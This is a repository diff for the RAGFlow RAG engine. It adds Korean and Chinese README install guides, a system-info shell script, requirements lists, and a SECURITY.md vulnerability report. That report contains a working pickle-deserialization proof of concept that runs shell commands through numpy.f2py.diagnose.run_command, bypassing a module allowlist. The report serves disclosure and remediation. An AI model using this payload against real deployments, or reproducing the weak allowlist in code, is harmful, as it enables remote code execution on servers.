+ $ conda activate ragflow
230
+ $ pip install -r requirements.txt
231
+ ```
232
+
233
+ ```bash
234
+ # CUDA 버전��� 12.0보다 높은 경우, 다음 명령어를 추가로 실행하세요:
235
+ $ pip uninstall -y onnxruntime-gpu
236
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
237
+ ```
238
+
239
+ 3. 진입 스크립트를 복사하고 환경 변수를 설정하세요:
240
+ ```bash
241
+ # 파이썬 경로를 받아옵니다:
242
+ $ which python
243
+ # RAGFlow 프로젝트 경로를 받아옵니다:
244
+ $ pwd
245
+ ```
246
+
247
+ ```bash
248
+ $ cp docker/entrypoint.sh .
249
+ $ vi entrypoint.sh
250
+ ```
251
+
252
+ ```bash
253
+ # 실제 상황에 맞게 설정 조정하기 (다음 두 개의 export 명령어는 새로 추가되었습니다):
254
+ # - `which python`의 결과를 `PY`에 할당합니다.
255
+ # - `pwd`의 결과를 `PYTHONPATH`에 할당합니다.
256
+ # - `LD_LIBRARY_PATH`가 설정되어 있는 경우 주석 처리합니다.
257
+ # - 선택 사항: Hugging Face 미러 추가.
258
+ PY=${PY}
259
+ export PYTHONPATH=${PYTHONPATH}
260
+ export HF_ENDPOINT=https://hf-mirror.com
261
+ ```
262
+
263
+ 4. 다른 서비스(MinIO, Elasticsearch, Redis, MySQL)를 시작하세요:
264
+ ```bash
265
+ $ cd docker
266
+ $ docker compose -f docker-compose-base.yml up -d
267
+ ```
268
+
269
+ 5. 설정 파일을 확인하여 다음 사항을 확인하세요:
270
+ - **docker/.env**의 설정이 **conf/service_conf.yaml**의 설정과 일치하는지 확인합니다.
271
+ - **service_conf.yaml**의 관련 서비스에 대한 IP 주소와 포트가 로컬 머신의 IP 주소와 컨테이너에서 노출된 포트와 일치하는지 확인합니다.
272
+
273
+
274
+ 6. RAGFlow 백엔드 서비스를 시작합니다:
275
+
276
+ ```bash
277
+ $ chmod +x ./entrypoint.sh
278
+ $ bash ./entrypoint.sh
279
+ ```
280
+
281
+ 7. 프론트엔드 서비스를 시작합니다:
282
+
283
+ ```bash
284
+ $ cd web
285
+ $ npm install --registry=https://registry.npmmirror.com --force
286
+ $ vim .umirc.ts
287
+ # proxy.target을 http://127.0.0.1:9380로 업데이트합니다.
288
+ $ npm run dev
289
+ ```
290
+
291
+ 8. 프론트엔드 서비스를 배포합니다:
292
+
293
+ ```bash
294
+ $ cd web
295
+ $ npm install --registry=https://registry.npmmirror.com --force
296
+ $ umi build
297
+ $ mkdir -p /ragflow/web
298
+ $ cp -r dist /ragflow/web
299
+ $ apt install nginx -y
300
+ $ cp ../docker/nginx/proxy.conf /etc/nginx
301
+ $ cp ../docker/nginx/nginx.conf /etc/nginx
302
+ $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
303
+ $ systemctl start nginx
304
+ ```
305
+
306
+ ## 📚 문서
307
+
308
+ - [Quickstart](https://ragflow.io/docs/dev/)
309
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
310
+ - [References](https://ragflow.io/docs/dev/category/references)
311
+ - [FAQ](https://ragflow.io/docs/dev/faq)
312
+
313
+ ## 📜 로드맵
314
+
315
+ [RAGFlow 로드맵 2024](https://github.com/infiniflow/ragflow/issues/162)을 확인하세요.
316
+
317
+ ## 🏄 커뮤니티
318
+
319
+ - [Discord](https://discord.gg/4XxujFgUN7)
320
+ - [Twitter](https://twitter.com/infiniflowai)
321
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
322
+
323
+ ## 🙌 컨트리뷰션
324
+
325
+ RAGFlow는 오픈소스 협업을 통해 발전합니다. 이러한 정신을 바탕으로, 우리는 커뮤니티의 다양한 기여를 환영합니다. 참여하고 싶으시다면, 먼저 [가이드라인](./docs/references/CONTRIBUTING.md)을 검토해 주세요.
README_zh.md ADDED
@@ -0,0 +1,329 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_ja.md">日本語</a> |
11
+ <a href="./README_ko.md">한국어</a>
12
+ </p>
13
+
14
+ <p align="center">
15
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
16
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
17
+ </a>
18
+ <a href="https://demo.ragflow.io" target="_blank">
19
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
20
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
21
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.11.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.11.0"></a>
22
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
23
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
24
+ </a>
25
+ </p>
26
+
27
+ <h4 align="center">
28
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
29
+ <a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
30
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
31
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
32
+ <a href="https://demo.ragflow.io">Demo</a>
33
+ </h4>
34
+
35
+ ## 💡 RAGFlow 是什么?
36
+
37
+ [RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
38
+
39
+ ## 🎮 Demo 试用
40
+
41
+ 请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
42
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
43
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
44
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/b083d173-dadc-4ea9-bdeb-180d7df514eb" width="1200"/>
45
+ </div>
46
+
47
+
48
+ ## 🔥 近期更新
49
+
50
+ - 2024-09-13 增加知识库问答搜索模式。
51
+ - 2024-09-09 在 Agent 中加入医疗问诊模板。
52
+ - 2024-08-22 支持用RAG技术实现从自然语言到SQL语句的转换。
53
+ - 2024-08-02 支持 GraphRAG 启发于 [graphrag](https://github.com/microsoft/graphrag) 和思维导图。
54
+ - 2024-07-23 支持解析音频文件。
55
+ - 2024-07-08 支持 Agentic RAG: 基于 [Graph](./agent/README.md) 的工作流。
56
+ - 2024-06-27 Q&A 解析方式支持 Markdown 文件和 Docx 文件,支持提取出 Docx 文件中的图片和 Markdown 文件中的表格。
57
+ - 2024-05-23 实现 [RAPTOR](https://arxiv.org/html/2401.18059v1) 提供更好的文本检索。
58
+
59
+ ## 🌟 主要功能
60
+
61
+ ### 🍭 **"Quality in, quality out"**
62
+
63
+ - 基于[深度文档理解](./deepdoc/README.md),能够从各类复杂格式的非结构化数据中提取真知灼见。
64
+ - 真正在无限上下文(token)的场景下快速完成大海捞针测试。
65
+
66
+ ### 🍱 **基于模板的文本切片**
67
+
68
+ - 不仅仅是智能,更重要的是可控可解释。
69
+ - 多种文本模板可供选择
70
+
71
+ ### 🌱 **有理有据、最大程度降低幻觉(hallucination)**
72
+
73
+ - 文本切片过程可视化,支持手动调整。
74
+ - 有理有据:答案提供关键引用的快照并支持追根溯源。
75
+
76
+ ### 🍔 **兼容各类异构数据源**
77
+
78
+ - 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
79
+
80
+ ### 🛀 **全程无忧、自动化的 RAG 工作流**
81
+
82
+ - 全面优化的 RAG 工作流可以支持从个人应用乃至超大型企业的各类生态系统。
83
+ - 大语言模型 LLM 以及向量模型均支持配置。
84
+ - 基于多路召回、融合重排序。
85
+ - 提供易用的 API,可以轻松集成到各类企业系统。
86
+
87
+ ## 🔎 系统架构
88
+
89
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
90
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
91
+ </div>
92
+
93
+ ## 🎬 快速开始
94
+
95
+ ### 📝 前提条件
96
+
97
+ - CPU >= 4 核
98
+ - RAM >= 16 GB
99
+ - Disk >= 50 GB
100
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
101
+ > 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
102
+
103
+ ### 🚀 启动服务器
104
+
105
+ 1. 确保 `vm.max_map_count` 不小于 262144:
106
+
107
+ > 如需确认 `vm.max_map_count` 的大小:
108
+ >
109
+ > ```bash
110
+ > $ sysctl vm.max_map_count
111
+ > ```
112
+ >
113
+ > 如果 `vm.max_map_count` 的值小于 262144,可以进行重置:
114
+ >
115
+ > ```bash
116
+ > # 这里我们设为 262144:
117
+ > $ sudo sysctl -w vm.max_map_count=262144
118
+ > ```
119
+ >
120
+ > 你的改动会���下次系统重启时被重置。如果希望做永久改动,还需要在 **/etc/sysctl.conf** 文件里把 `vm.max_map_count` 的值再相应更新一遍:
121
+ >
122
+ > ```bash
123
+ > vm.max_map_count=262144
124
+ > ```
125
+
126
+ 2. 克隆仓库:
127
+
128
+ ```bash
129
+ $ git clone https://github.com/infiniflow/ragflow.git
130
+ ```
131
+
132
+ 3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
133
+
134
+ ```bash
135
+ $ cd ragflow/docker
136
+ $ chmod +x ./entrypoint.sh
137
+ $ docker compose -f docker-compose-CN.yml up -d
138
+ ```
139
+
140
+ > 请注意,运行上述命令会自动下载 RAGFlow 的开发版本 docker 镜像。如果你想下载并运行特定版本的 docker 镜像,请在 docker/.env 文件中找到 RAGFLOW_VERSION 变量,将其改为对应版本。例如 RAGFLOW_VERSION=v0.11.0,然后运行上述命令。
141
+
142
+ > 核心镜像文件大约 9 GB,可能需要一定时间拉取。请耐心等待。
143
+
144
+ 4. 服务器启动成功后再次确认服务器状态:
145
+
146
+ ```bash
147
+ $ docker logs -f ragflow-server
148
+ ```
149
+
150
+ _出现以下界面提示说明服务器启动成功:_
151
+
152
+ ```bash
153
+ ____ ______ __
154
+ / __ \ ____ _ ____ _ / ____// /____ _ __
155
+ / /_/ // __ `// __ `// /_ / // __ \| | /| / /
156
+ / _, _// /_/ // /_/ // __/ / // /_/ /| |/ |/ /
157
+ /_/ |_| \__,_/ \__, //_/ /_/ \____/ |__/|__/
158
+ /____/
159
+
160
+ * Running on all addresses (0.0.0.0)
161
+ * Running on http://127.0.0.1:9380
162
+ * Running on http://x.x.x.x:9380
163
+ INFO:werkzeug:Press CTRL+C to quit
164
+ ```
165
+ > 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network abnormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
166
+
167
+ 5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
168
+ > 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
169
+ 6. 在 [service_conf.yaml](./docker/service_conf.yaml) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
170
+
171
+ > 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
172
+
173
+ _好戏开始,接着奏乐接着舞!_
174
+
175
+ ## 🔧 系统配置
176
+
177
+ 系统配置涉及以下三份文件:
178
+
179
+ - [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
180
+ - [service_conf.yaml](./docker/service_conf.yaml):配置各类后台服务。
181
+ - [docker-compose-CN.yml](./docker/docker-compose-CN.yml): 系统依赖该文件完成启动。
182
+
183
+ 请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml](./docker/service_conf.yaml) 文件中的配置保持一致!
184
+
185
+ > [./docker/README](./docker/README.md) 文件提供了环境变量设置和服务配置的详细信息。请**一定要**确保 [./docker/README](./docker/README.md) 文件当中列出来的环境变量的值与 [service_conf.yaml](./docker/service_conf.yaml) 文件当中的系统配置保持一致。
186
+
187
+ 如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose-CN.yml](./docker/docker-compose-CN.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
188
+
189
+ > 所有系统配置都需要通过系统重启生效:
190
+ >
191
+ > ```bash
192
+ > $ docker compose -f docker-compose-CN.yml up -d
193
+ > ```
194
+
195
+ ## 🛠️ 源码编译、安装 Docker 镜像
196
+
197
+ 如需从源码安装 Docker 镜像:
198
+
199
+ ```bash
200
+ $ git clone https://github.com/infiniflow/ragflow.git
201
+ $ cd ragflow/
202
+ $ docker build -t infiniflow/ragflow:v0.11.0 .
203
+ $ cd ragflow/docker
204
+ $ chmod +x ./entrypoint.sh
205
+ $ docker compose up -d
206
+ ```
207
+
208
+ ## 🛠️ 源码启动服务
209
+
210
+ 如需从源码启动服务,请参考以下步骤:
211
+
212
+ 1. 克隆仓库
213
+
214
+ ```bash
215
+ $ git clone https://github.com/infiniflow/ragflow.git
216
+ $ cd ragflow/
217
+ ```
218
+
219
+ 2. 创建虚拟环境(确保已安装 Anaconda 或 Miniconda)
220
+
221
+ ```bash
222
+ $ conda create -n ragflow python=3.11.0
223
+ $ conda activate ragflow
224
+ $ pip install -r requirements.txt
225
+ ```
226
+ 如果 cuda > 12.0,需额外执行以下命令:
227
+ ```bash
228
+ $ pip uninstall -y onnxruntime-gpu
229
+ $ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
230
+ ```
231
+
232
+ 3. 拷贝入口脚本并配置环境变量
233
+
234
+ ```bash
235
+ $ cp docker/entrypoint.sh .
236
+ $ vi entrypoint.sh
237
+ ```
238
+ 使用以下命令获取python路径及ragflow项目路径:
239
+ ```bash
240
+ $ which python
241
+ $ pwd
242
+ ```
243
+
244
+ 将上述 `which python` 的输出作为 `PY` 的值,将 `pwd` 的输出作为 `PYTHONPATH` 的值。
245
+
246
+ `LD_LIBRARY_PATH` 如果环境已经配置好,可以注释掉。
247
+
248
+ ```bash
249
+ # 此处配置需要按照实际情况调整,两个 export 为新增配置
250
+ PY=${PY}
251
+ export PYTHONPATH=${PYTHONPATH}
252
+ # 可选:添加 Hugging Face 镜像
253
+ export HF_ENDPOINT=https://hf-mirror.com
254
+ ```
255
+
256
+ 4. 启动基础服务
257
+
258
+ ```bash
259
+ $ cd docker
260
+ $ docker compose -f docker-compose-base.yml up -d
261
+ ```
262
+
263
+ 5. 检查配置文件
264
+ 确保**docker/.env**中的配置与**conf/service_conf.yaml**中配置一致, **service_conf.yaml**中相关服务的IP地址与端口应该改成本机IP地址及容器映射出来的端口。
265
+
266
+ 6. 启动服务
267
+
268
+ ```bash
269
+ $ chmod +x ./entrypoint.sh
270
+ $ bash ./entrypoint.sh
271
+ ```
272
+
273
+ 7. 启动WebUI服务
274
+
275
+ ```bash
276
+ $ cd web
277
+ $ npm install --registry=https://registry.npmmirror.com --force
278
+ $ vim .umirc.ts
279
+ # 修改proxy.target为http://127.0.0.1:9380
280
+ $ npm run dev
281
+ ```
282
+
283
+ 8. 部署WebUI服务
284
+
285
+ ```bash
286
+ $ cd web
287
+ $ npm install --registry=https://registry.npmmirror.com --force
288
+ $ umi build
289
+ $ mkdir -p /ragflow/web
290
+ $ cp -r dist /ragflow/web
291
+ $ apt install nginx -y
292
+ $ cp ../docker/nginx/proxy.conf /etc/nginx
293
+ $ cp ../docker/nginx/nginx.conf /etc/nginx
294
+ $ cp ../docker/nginx/ragflow.conf /etc/nginx/conf.d
295
+ $ systemctl start nginx
296
+ ```
297
+ ## 📚 技术文档
298
+
299
+ - [Quickstart](https://ragflow.io/docs/dev/)
300
+ - [User guide](https://ragflow.io/docs/dev/category/user-guides)
301
+ - [References](https://ragflow.io/docs/dev/category/references)
302
+ - [FAQ](https://ragflow.io/docs/dev/faq)
303
+
304
+ ## 📜 路线图
305
+
306
+ 详见 [RAGFlow Roadmap 2024](https://github.com/infiniflow/ragflow/issues/162) 。
307
+
308
+ ## 🏄 开源社区
309
+
310
+ - [Discord](https://discord.gg/4XxujFgUN7)
311
+ - [Twitter](https://twitter.com/infiniflowai)
312
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
313
+
314
+ ## 🙌 贡献指南
315
+
316
+ RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./docs/references/CONTRIBUTING.md) 。
317
+
318
+ ## 🤝 商务合作
319
+
320
+ - [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
321
+
322
+ ## 👥 加入社区
323
+
324
+ 扫二维码添加 RAGFlow 小助手,进 RAGFlow 交流群。
325
+
326
+ <p align="center">
327
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
328
+ </p>
329
+
SECURITY.md ADDED
@@ -0,0 +1,74 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Security Policy
2
+
3
+ ## Supported Versions
4
+
5
+ Use this section to tell people about which versions of your project are
6
+ currently being supported with security updates.
7
+
8
+ | Version | Supported |
9
+ | ------- | ------------------ |
10
+ | <=0.7.0 | :white_check_mark: |
11
+
12
+ ## Reporting a Vulnerability
13
+
14
+ ### Branch name
15
+
16
+ main
17
+
18
+ ### Actual behavior
19
+
20
+ The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
21
+ The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
22
+
23
+
24
+ ### Steps to reproduce
25
+
26
+
27
+ **ragflow_patch.py**
28
+
29
+ ```py
30
+ import builtins
31
+ import io
32
+ import pickle
33
+
34
+ safe_module = {
35
+ 'numpy',
36
+ 'rag_flow'
37
+ }
38
+
39
+
40
+ class RestrictedUnpickler(pickle.Unpickler):
41
+ def find_class(self, module, name):
42
+ import importlib
43
+ if module.split('.')[0] in safe_module:
44
+ _module = importlib.import_module(module)
45
+ return getattr(_module, name)
46
+ # Forbid everything else.
47
+ raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
48
+ (module, name))
49
+
50
+
51
+ def restricted_loads(src):
52
+ """Helper function analogous to pickle.loads()."""
53
+ return RestrictedUnpickler(io.BytesIO(src)).load()
54
+ ```
55
+ Then, **PoC.py**
56
+ ```py
57
+ import pickle
58
+ from ragflow_patch import restricted_loads
59
+ class Exploit:
60
+ def __reduce__(self):
61
+ import numpy.f2py.diagnose
62
+ return numpy.f2py.diagnose.run_command, ('whoami', )
63
+
64
+ Payload=pickle.dumps(Exploit())
65
+ restricted_loads(Payload)
66
+ ```
67
+ **Result**
68
+ ![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
69
+
70
+
71
+ ### Additional information
72
+
73
+ #### How to prevent?
74
+ Strictly filter the module and name before calling with getattr function.
printEnvironment.sh ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/bin/bash
2
+
3
+ # The function is used to obtain distribution information
4
+ get_distro_info() {
5
+ local distro_id=$(lsb_release -i -s 2>/dev/null)
6
+ local distro_version=$(lsb_release -r -s 2>/dev/null)
7
+ local kernel_version=$(uname -r)
8
+
9
+ # If lsd_release is not available, try parsing the/etc/* - release file
10
+ if [ -z "$distro_id" ] || [ -z "$distro_version" ]; then
11
+ distro_id=$(grep '^ID=' /etc/*-release | cut -d= -f2 | tr -d '"')
12
+ distro_version=$(grep '^VERSION_ID=' /etc/*-release | cut -d= -f2 | tr -d '"')
13
+ fi
14
+
15
+ echo "$distro_id $distro_version (Kernel version: $kernel_version)"
16
+ }
17
+
18
+ # get Git repo name
19
+ git_repo_name=''
20
+ if git rev-parse --is-inside-work-tree > /dev/null 2>&1; then
21
+ git_repo_name=$(basename "$(git rev-parse --show-toplevel)")
22
+ if [ $? -ne 0 ]; then
23
+ git_repo_name="(Can't get repo name)"
24
+ fi
25
+ else
26
+ git_repo_name="It NOT a Git repo"
27
+ fi
28
+
29
+ # get CPU type
30
+ cpu_model=$(uname -m)
31
+
32
+ # get memory size
33
+ memory_size=$(free -h | grep Mem | awk '{print $2}')
34
+
35
+ # get docker version
36
+ docker_version=''
37
+ if command -v docker &> /dev/null; then
38
+ docker_version=$(docker --version | cut -d ' ' -f3)
39
+ else
40
+ docker_version="Docker not installed"
41
+ fi
42
+
43
+ # get python version
44
+ python_version=''
45
+ if command -v python &> /dev/null; then
46
+ python_version=$(python --version | cut -d ' ' -f2)
47
+ else
48
+ python_version="Python not installed"
49
+ fi
50
+
51
+ # Print all infomation
52
+ echo "Current Repo: $git_repo_name"
53
+
54
+ # get Commit ID
55
+ git_version=$(git log -1 --pretty=format:'%h')
56
+
57
+ if [ -z "$git_version" ]; then
58
+ echo "Commit Id: The current directory is not a Git repository, or the Git command is not installed."
59
+ else
60
+ echo "Commit Id: $git_version"
61
+ fi
62
+
63
+ echo "Operating system: $(get_distro_info)"
64
+ echo "CPU Type: $cpu_model"
65
+ echo "Memory: $memory_size"
66
+ echo "Docker Version: $docker_version"
67
+ echo "Python Version: $python_version"
requirements.txt ADDED
@@ -0,0 +1,104 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ akshare==1.14.72
2
+ azure-storage-blob==12.22.0
3
+ azure-identity==1.17.1
4
+ azure-storage-file-datalake==12.16.0
5
+ anthropic===0.34.1
6
+ arxiv==2.1.3
7
+ Aspose.Slides==24.2.0
8
+ BCEmbedding==0.1.3
9
+ Bio==1.7.1
10
+ boto3==1.34.140
11
+ botocore==1.34.140
12
+ cachetools==5.3.3
13
+ chardet==5.2.0
14
+ cn2an==0.5.22
15
+ cohere==5.6.2
16
+ dashscope==1.14.1
17
+ datrie==0.8.2
18
+ deepl==1.18.0
19
+ demjson3==3.0.6
20
+ discord.py==2.3.2
21
+ duckduckgo_search==6.1.9
22
+ editdistance==0.8.1
23
+ elastic_transport==8.12.0
24
+ elasticsearch==8.12.1
25
+ elasticsearch_dsl==8.12.0
26
+ fastembed==0.2.6
27
+ fasttext==0.9.3
28
+ filelock==3.15.4
29
+ FlagEmbedding==1.2.10
30
+ Flask==3.0.3
31
+ Flask_Cors==5.0.0
32
+ Flask_Login==0.6.3
33
+ flask_session==0.8.0
34
+ google_search_results==2.4.2
35
+ groq==0.9.0
36
+ hanziconv==0.3.2
37
+ html_text==0.6.2
38
+ httpx==0.27.0
39
+ huggingface_hub==0.20.3
40
+ infinity_emb==0.0.51
41
+ itsdangerous==2.1.2
42
+ Markdown==3.6
43
+ markdown_to_json==2.1.1
44
+ minio==7.2.4
45
+ mistralai==0.4.2
46
+ nltk==3.9
47
+ numpy==1.26.4
48
+ ollama==0.2.1
49
+ onnxruntime==1.17.3
50
+ onnxruntime_gpu==1.17.1
51
+ openai==1.12.0
52
+ opencv_python==4.9.0.80
53
+ opencv_python_headless==4.9.0.80
54
+ openpyxl==3.1.2
55
+ ormsgpack==1.5.0
56
+ pandas==2.2.2
57
+ pdfplumber==0.10.4
58
+ peewee==3.17.1
59
+ Pillow==10.3.0
60
+ pipreqs==0.5.0
61
+ protobuf==5.27.2
62
+ psycopg2-binary==2.9.9
63
+ pyclipper==1.3.0.post5
64
+ pycryptodomex==3.20.0
65
+ pypdf==4.3.0
66
+ PyPDF2==3.0.1
67
+ pytest==8.2.2
68
+ python-dotenv==1.0.1
69
+ python_dateutil==2.8.2
70
+ python_pptx==0.6.23
71
+ pywencai==0.12.2
72
+ qianfan==0.4.6
73
+ ranx==0.3.20
74
+ readability_lxml==0.8.1
75
+ redis==5.0.3
76
+ Requests==2.32.2
77
+ replicate==0.31.0
78
+ roman_numbers==1.0.2
79
+ ruamel.base==1.0.0
80
+ scholarly==1.7.11
81
+ scikit_learn==1.5.0
82
+ selenium==4.22.0
83
+ setuptools==70.0.0
84
+ Shapely==2.0.5
85
+ six==1.16.0
86
+ StrEnum==0.4.15
87
+ tabulate==0.9.0
88
+ tencentcloud-sdk-python==3.0.1215
89
+ tika==2.6.0
90
+ tiktoken==0.6.0
91
+ torch==2.3.0
92
+ transformers==4.38.1
93
+ umap==0.1.1
94
+ vertexai==1.64.0
95
+ volcengine==1.0.146
96
+ voyageai==0.2.3
97
+ webdriver_manager==4.0.1
98
+ Werkzeug==3.0.3
99
+ wikipedia==1.4.0
100
+ word2number==1.1
101
+ xgboost==2.1.0
102
+ xpinyin==0.7.6
103
+ yfinance==0.1.96
104
+ zhipuai==2.0.1
requirements_arm.txt ADDED
@@ -0,0 +1,175 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ accelerate==0.27.2
2
+ aiohttp==3.10.2
3
+ aiosignal==1.3.1
4
+ annotated-types==0.6.0
5
+ anthropic===0.34.1
6
+ anyio==4.3.0
7
+ argon2-cffi==23.1.0
8
+ argon2-cffi-bindings==21.2.0
9
+ #Aspose.Slides==24.2.0
10
+ attrs==23.2.0
11
+ blinker==1.7.0
12
+ cachelib==0.12.0
13
+ cachetools==5.3.3
14
+ certifi==2024.7.4
15
+ cffi==1.16.0
16
+ charset-normalizer==3.3.2
17
+ click==8.1.7
18
+ cohere==5.6.2
19
+ coloredlogs==15.0.1
20
+ cryptography==43.0.1
21
+ dashscope==1.14.1
22
+ datasets==2.17.1
23
+ datrie==0.8.2
24
+ demjson3==3.0.6
25
+ dill==0.3.8
26
+ distro==1.9.0
27
+ elastic-transport==8.12.0
28
+ elasticsearch==8.12.1
29
+ elasticsearch-dsl==8.12.0
30
+ et-xmlfile==1.1.0
31
+ filelock==3.13.1
32
+ fastembed==0.2.6
33
+ FlagEmbedding==1.2.5
34
+ Flask==3.0.2
35
+ Flask-Cors==5.0.0
36
+ Flask-Login==0.6.3
37
+ Flask-Session==0.6.0
38
+ flatbuffers==23.5.26
39
+ frozenlist==1.4.1
40
+ fsspec==2023.10.0
41
+ h11==0.14.0
42
+ hanziconv==0.3.2
43
+ httpcore==1.0.4
44
+ httpx==0.27.0
45
